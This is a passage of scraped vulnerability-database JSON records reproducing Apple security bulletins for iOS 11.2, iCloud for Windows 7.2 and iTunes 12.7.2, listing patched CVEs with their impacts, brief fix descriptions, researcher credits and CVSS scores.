Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreAnimation**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7171: 360 Security working with Trend Micro's Zero Day Initiative, and Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreFoundation**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-7151: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**IOKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: Multiple memory corruption issues were addressed through improved state management.\n\nCVE-2017-13847: Ian Beer of Google Project Zero\n\nEntry updated January 10, 2018\n\n**IOKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7162: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added December 21, 2017, updated January 10, 2018\n\n**IOMobileFrameBuffer**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13879: Apple\n\nEntry updated October 24, 2018\n\n**IOSurface**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13861: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13904: Kevin Backhouse of Semmle Ltd.\n\nEntry added February 14, 2018\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to read kernel memory (Meltdown)\n\nDescription: Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis of the data cache.\n\nCVE-2017-5754: Jann Horn of Google Project Zero; Moritz Lipp of Graz University of Technology; Michael Schwarz of Graz University of Technology; Daniel Gruss of Graz University of Technology; Thomas Prescher of Cyberus Technology GmbH; Werner Haas of Cyberus Technology GmbH; Stefan Mangard of Graz University of Technology; Paul Kocher; Daniel Genkin of University of Pennsylvania and University of Maryland; Yuval Yarom of University of Adelaide and Data61; and Mike Hamburg of Rambus (Cryptography Research Division)\n\nEntry added January 4, 2018, updated January 10, 2018\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13862: Apple\n\nCVE-2017-13867: Ian Beer of Google Project Zero\n\nCVE-2017-13876: Ian Beer of Google Project Zero\n\nEntry updated December 21, 2017\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to read restricted memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2017-7173: Brandon Azad\n\nEntry updated August 1, 2018\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to read restricted memory\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2017-13855: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to read restricted memory\n\nDescription: Multiple validation issues were addressed with improved input sanitization.\n\nCVE-2017-13865: Ian Beer of Google Project Zero\n\nCVE-2017-13868: Brandon Azad\n\nCVE-2017-13869: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A local user may be able to cause unexpected system termination or read kernel memory\n\nDescription: An input validation issue existed in the kernel. This issue was addressed through improved input validation.\n\nCVE-2017-7154: Jann Horn of Google Project Zero\n\nEntry added December 21, 2017\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privilege\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13880: Apple\n\nEntry added October 18, 2018\n\n**Mail**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Incorrect certificate is used for encryption\n\nDescription: A S/MIME issue existed in the handling of encrypted email. This issue was addressed through improved selection of the encryption certificate.\n\nCVE-2017-13874: Nicolas Devillard\n\nEntry updated April 9, 2018\n\n**Mail Drafts**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An attacker with a privileged network position may be able to intercept mail\n\nDescription: An encryption issue existed with S/MIME credentials. The issue was addressed with additional checks and user control.\n\nCVE-2017-13860: Michael Weishaar of INNEO Solutions GmbH\n\n**Mail Message Framework**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: An inconsistent user interface issue was addressed with improved state management.\n\nCVE-2017-7152: Oliver Paukstadt of Thinking Objects GmbH (to.com)\n\nEntry added December 21, 2017\n\n**ReplayKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A user may not have control over their screen broadcast\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2017-13888: Dan Niemeyer of Microsoft, Peter Pau (ArcanaArt.com)\n\nEntry added June 21, 2018, updated September 8, 2020\n\n**SafariViewController**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: An inconsistent user interface issue was addressed through improved state management.\n\nCVE-2017-13891: Janne Raiskila (@raiskila)\n\nEntry added June 21, 2018\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13885: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-7165: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13884: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Visiting a malicious website may lead to user interface spoofing\n\nDescription: Redirect responses to 401 Unauthorized may allow a malicious website to incorrectly display the lock icon on mixed content. This issue was addressed through improved URL display logic.\n\nCVE-2017-7153: Jerry Decime\n\nEntry added January 11, 2018\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7156: Yuan Deng of Ant-financial Light-Year Security Lab\n\nCVE-2017-7157: an anonymous researcher\n\nCVE-2017-13856: Jeonghoon Shin\n\nCVE-2017-13870: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-7160: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-13866: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added December 13, 2017, updated May 4, 2018\n\n**Wi-Fi**\n\nAvailable for: iPhone 6s, iPhone 6s Plus, iPhone 6, iPhone 6 Plus, iPhone SE, iPhone 5s, 12.9-inch iPad Pro 1st generation, iPad Air 2, iPad Air, iPad 5th generation, iPad mini 4, iPad mini 3, iPad mini 2, and iPod touch 6th generation \nReleased for iPhone 7 and later and iPad Pro 9.7-inch (early 2016) and later in [iOS 11.1](<https://support.apple.com/kb/HT208222>).\n\nImpact: An attacker in Wi-Fi range may force nonce reuse in WPA multicast/GTK clients (Key Reinstallation Attacks - KRACK)\n\nDescription: A logic issue existed in the handling of state transitions. This was addressed with improved state management.\n\nCVE-2017-13080: Mathy Vanhoef of the imec-DistriNet group at KU Leuven\n\n![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)\n\n## Additional recognition\n\n**WebKit**\n\nWe would like to acknowledge Yi\u011fit Can YILMAZ (@yilmazcanyigit) and Abhinash Jain (@abhinashjain) researcher for their assistance.\n\nEntry added February 14, 2018, updated April 9, 2018\n", "edition": 4, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-09-08T03:53:28", "title": "About the security content of iOS 11.2 - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2411", "CVE-2017-13869", "CVE-2017-5754", "CVE-2017-7152", "CVE-2017-13856", "CVE-2017-13866", "CVE-2017-7151", "CVE-2017-13080", "CVE-2017-13865", "CVE-2017-13860", "CVE-2017-13888", "CVE-2017-13880", "CVE-2017-7172", "CVE-2017-7165", "CVE-2017-13904", "CVE-2017-13891", "CVE-2017-7171", "CVE-2017-13855", "CVE-2017-7162", "CVE-2017-13876", "CVE-2017-13870", "CVE-2017-13868", "CVE-2017-7153", "CVE-2017-7156", "CVE-2017-13847", "CVE-2017-7160", "CVE-2017-13884", "CVE-2017-13874", "CVE-2017-13867", "CVE-2017-13879", "CVE-2017-7173", "CVE-2017-13861", "CVE-2017-7154", "CVE-2017-7157", "CVE-2017-13905", "CVE-2017-13885", "CVE-2017-13862", "CVE-2017-7164"], "modified": "2020-09-08T03:53:28", "id": "APPLE:HT208334", "href": "https://support.apple.com/kb/HT208334", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-10T17:00:35", "description": "# About the security content of iCloud for Windows 7.2\n\nThis document describes the security content of iCloud for Windows 7.2.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)\n\n## iCloud for Windows 7.2\n\nReleased December 13, 2017\n\n**APNs Server**\n\nAvailable for: Windows 7 and later\n\nImpact: An attacker in a privileged network position could track a user\n\nDescription: A privacy issue existed in the use of client certificates. This issue was addressed through a revised protocol. \n\nCVE-2017-13864: FURIOUSMAC Team of United States Naval Academy\n\nEntry updated December 21, 2017\n\n**CFNetwork Session**\n\nAvailable for: Windows 7 and later\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7172: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13885: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-7165: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13884: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Visiting a malicious website may lead to user interface spoofing\n\nDescription: Redirect responses to 401 Unauthorized may allow a malicious website to incorrectly display the lock icon on mixed content. This issue was addressed through improved URL display logic.\n\nCVE-2017-7153: Jerry Decime\n\nEntry added January 11, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7156: Yuan Deng of Ant-financial Light-Year Security Lab\n\nCVE-2017-7157: an anonymous researcher\n\nCVE-2017-13856: Jeonghoon Shin\n\nCVE-2017-13870: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-13866: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-7160: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nEntry updated January 10, 2018\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: January 25, 2018\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-13T00:00:00", "type": "apple", "title": "About the security content of iCloud for Windows 7.2", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13856", "CVE-2017-13864", "CVE-2017-13866", "CVE-2017-13870", "CVE-2017-13884", "CVE-2017-13885", "CVE-2017-7153", "CVE-2017-7156", "CVE-2017-7157", "CVE-2017-7160", "CVE-2017-7165", "CVE-2017-7172"], "modified": "2017-12-13T00:00:00", "id": "APPLE:D5B2B0A52189C378A357D40438F75CF8", "href": "https://support.apple.com/kb/HT208328", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:42:47", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)\n\n## iCloud for Windows 7.2\n\nReleased December 13, 2017\n\n**APNs Server**\n\nAvailable for: Windows 7 and later\n\nImpact: An attacker in a privileged network position could track a user\n\nDescription: A privacy issue existed in the use of client certificates. This issue was addressed through a revised protocol. \n\nCVE-2017-13864: FURIOUSMAC Team of United States Naval Academy\n\nEntry updated December 21, 2017\n\n**CFNetwork Session**\n\nAvailable for: Windows 7 and later\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7172: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13885: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-7165: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13884: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Visiting a malicious website may lead to user interface spoofing\n\nDescription: Redirect responses to 401 Unauthorized may allow a malicious website to incorrectly display the lock icon on mixed content. This issue was addressed through improved URL display logic.\n\nCVE-2017-7153: Jerry Decime\n\nEntry added January 11, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7156: Yuan Deng of Ant-financial Light-Year Security Lab\n\nCVE-2017-7157: an anonymous researcher\n\nCVE-2017-13856: Jeonghoon Shin\n\nCVE-2017-13870: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-13866: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-7160: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nEntry updated January 10, 2018\n", "edition": 3, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-01-25T06:02:26", "title": "About the security content of iCloud for Windows 7.2 - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13864", "CVE-2017-13856", "CVE-2017-13866", "CVE-2017-7172", "CVE-2017-7165", "CVE-2017-13870", "CVE-2017-7153", "CVE-2017-7156", "CVE-2017-7160", "CVE-2017-13884", "CVE-2017-7157", "CVE-2017-13885"], "modified": "2018-01-25T06:02:26", "id": "APPLE:HT208328", "href": "https://support.apple.com/kb/HT208328", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-10T17:00:38", "description": "# About the security content of iTunes 12.7.2 for Windows\n\nThis document describes the security content of iTunes 12.7.2 for Windows.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)\n\n## iTunes 12.7.2 for Windows\n\nReleased December 6, 2017\n\n**APNs Server**\n\nAvailable for: Windows 7 and later\n\nImpact: An attacker in a privileged network position could track a user\n\nDescription: A privacy issue existed in the use of client certificates. This issue was addressed through a revised protocol. \n\nCVE-2017-13864: FURIOUSMAC Team of United States Naval Academy\n\nEntry updated December 21, 2017\n\n**CFNetwork Session**\n\nAvailable for: Windows 7 and later\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7172: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreFoundation**\n\nAvailable for: Windows 7 and later\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-7151: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**ICU**\n\nAvailable for: Windows 7 and later\n\nImpact: An application may be able to read restricted memory\n\nDescription: An integer overflow was addressed through improved input validation.\n\nCVE-2017-15422: Yuan Deng of Ant-financial Light-Year Security Lab\n\nEntry added March 14, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13885: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-7165: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13884: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7156: Yuan Deng of Ant-financial Light-Year Security Lab\n\nCVE-2017-7157: an anonymous researcher\n\nCVE-2017-13856: Jeonghoon Shin\n\nCVE-2017-13870: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-7160: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-13866: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry updated January 10, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later \n\nImpact: Visiting a malicious website may lead to user interface spoofing\n\nDescription: Redirect responses to 401 Unauthorized may allow a malicious website to incorrectly display the lock icon on mixed content. This issue was addressed through improved URL display logic.\n\nCVE-2017-7153: Jerry Decime\n\nEntry added January 11, 2018\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: October 18, 2018\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-06T00:00:00", "type": "apple", "title": "About the security content of iTunes 12.7.2 for Windows", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13856", "CVE-2017-13864", "CVE-2017-13866", "CVE-2017-13870", "CVE-2017-13884", "CVE-2017-13885", "CVE-2017-15422", "CVE-2017-7151", "CVE-2017-7153", "CVE-2017-7156", "CVE-2017-7157", "CVE-2017-7160", "CVE-2017-7165", "CVE-2017-7172"], "modified": "2017-12-06T00:00:00", "id": "APPLE:B3402276360A8C507F94E26E15D465F4", "href": "https://support.apple.com/kb/HT208326", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:43:45", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)\n\n## iTunes 12.7.2 for Windows\n\nReleased December 6, 2017\n\n**APNs Server**\n\nAvailable for: Windows 7 and later\n\nImpact: An attacker in a privileged network position could track a user\n\nDescription: A privacy issue existed in the use of client certificates. This issue was addressed through a revised protocol. \n\nCVE-2017-13864: FURIOUSMAC Team of United States Naval Academy\n\nEntry updated December 21, 2017\n\n**CFNetwork Session**\n\nAvailable for: Windows 7 and later\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7172: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreFoundation**\n\nAvailable for: Windows 7 and later\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-7151: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**ICU**\n\nAvailable for: Windows 7 and later\n\nImpact: An application may be able to read restricted memory\n\nDescription: An integer overflow was addressed through improved input validation.\n\nCVE-2017-15422: Yuan Deng of Ant-financial Light-Year Security Lab\n\nEntry added March 14, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13885: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-7165: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13884: 360 Security working with Trend Micro's Zero Day 